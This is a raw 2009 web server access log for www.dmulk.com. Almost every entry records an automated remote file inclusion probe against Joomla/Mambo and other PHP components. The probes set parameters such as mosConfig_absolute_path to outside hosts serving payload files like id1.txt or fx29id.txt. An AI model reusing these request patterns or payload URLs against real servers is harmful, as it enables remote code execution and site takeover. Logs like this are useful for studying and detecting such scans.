218.234.21.178 - - [21/Jun/2009:10:30:42 -0700] "GET /logs/access_080508.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:30:43 -0700] "GET /logs/access_081021.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:30:43 -0700] "GET /logs/access_081007.log%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:30:44 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:10:30:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:47 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:47 -0700] "GET /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:47 -0700] "GET /logs/access_090101.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:54 -0700] "GET /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:54 -0700] "GET /logs/access_090101.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:54 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:30:55 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:30:55 -0700] "GET /logs/access_081124.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:56 -0700] "GET /logs/access_080422.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:59 -0700] "GET /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:59 -0700] "GET /logs/access_090101.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:30:59 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:31:00 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 200 20922 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:31:00 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:31:08 -0700] "GET /logs/access_080422.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:31:13 -0700] "GET /logs/access_080422.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:15 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:16 -0700] "GET /logs/access_090130.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:16 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:16 -0700] "GET /logs/access_090124.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:10:31:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:23 -0700] "GET /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:23 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:23 -0700] "GET /logs/access_090101.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:31:23 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:31:23 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:31:24 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:31:24 -0700] "GET /logs/access_081124.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:30 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:30 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:30 -0700] "GET /logs/access_080507.log%20%20//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:33 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 200 20954 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:31:40 -0700] "GET /logs/access_080422.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:31:41 -0700] "GET /logs/access_090226.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [21/Jun/2009:10:31:42 -0700] "GET /logs/access_081117.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:42 -0700] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:31:48 -0700] "GET /logs/access_090109.log//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:31:50 -0700] "GET /logs/access_090124.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:32:04 -0700] "GET /logs/access_090130.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:32:04 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:32:04 -0700] "GET /logs/access_090124.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:10:32:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:32:08 -0700] "GET /logs/access_090124.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:32:16 -0700] "GET /galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:32:16 -0700] "GET /logs//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:32:16 -0700] "GET /logs/access_081121.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:32:17 -0700] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:32:18 -0700] "GET /logs/access_081213.log%20%20//galeria.php?start=0&kategoria=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:32:19 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 200 20954 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:32:28 -0700] "GET /logs/access_080313.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:32:52 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:32:54 -0700] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:32:54 -0700] "GET /logs/access_090208.log%20%20//galeria.php?start=0&kategoria=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.40.150.211 - - [21/Jun/2009:10:33:04 -0700] "GET /logs/access_081117.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:33:08 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:33:08 -0700] "GET /logs/access_090124.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:33:17 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:21 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:23 -0700] "GET /logs/access_090101.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:33:23 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:10:33:23 -0700] "GET /logs/access_080719.log//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:29 -0700] "GET /logs/access_080422.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:29 -0700] "GET /logs/access_090101.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:30 -0700] "GET /logs/access_080507.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:33 -0700] "GET /logs/access_090101.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [21/Jun/2009:10:33:33 -0700] "GET /logs/access_080313.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:37 -0700] "GET /logs/access_080422.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:38 -0700] "GET /logs/access_080422.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:33:44 -0700] "GET /logs/access_090328.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:10:33:47 -0700] "GET /logs//index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:33:57 -0700] "GET /logs/access_090101.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:34:01 -0700] "GET /errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:34:01 -0700] "GET /logs/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:34:01 -0700] "GET /logs/access_090507.log/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:10:34:02 -0700] "GET /logs/access_081026.log/errors.php?error=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:10:34:04 -0700] "GET /logs/access_080422.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:10:34:04 -0700] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:10:34:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:10:34:10 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:10:34:10 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
218.38.16.54 - - [21/Jun/2009:10:34:10 -0700] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aeronautica.gob.pa/modules/MambWeather/Savant2/Folder_Baru/background.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:34:10 -0700] "GET /logs/access_081213.log%20%20//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:34:15 -0700] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:10:34:18 -0700] "GET /logs/access_090408.log//components/com_joomlaboard/file_upload.php?sbp=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:34:37 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 200 21006 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:34:37 -0700] "GET /logs/access_090317.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:10:34:37 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:35:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:35:03 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:35:03 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:10:35:03 -0700] "GET /logs/access_081124.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:35:16 -0700] "GET /logs/access_081021.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:35:16 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [21/Jun/2009:10:35:16 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:10:35:26 -0700] "GET /logs/access_081213.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:10:35:32 -0700] "GET /logs//index.php?p=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:35 -0700] "GET /logs/access_081002.log/modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:37 -0700] "GET /logs/access_090116.log/modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:10:35:37 -0700] "GET /logs/access_081002.log/modules/My_eGallery/index.php?basepath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
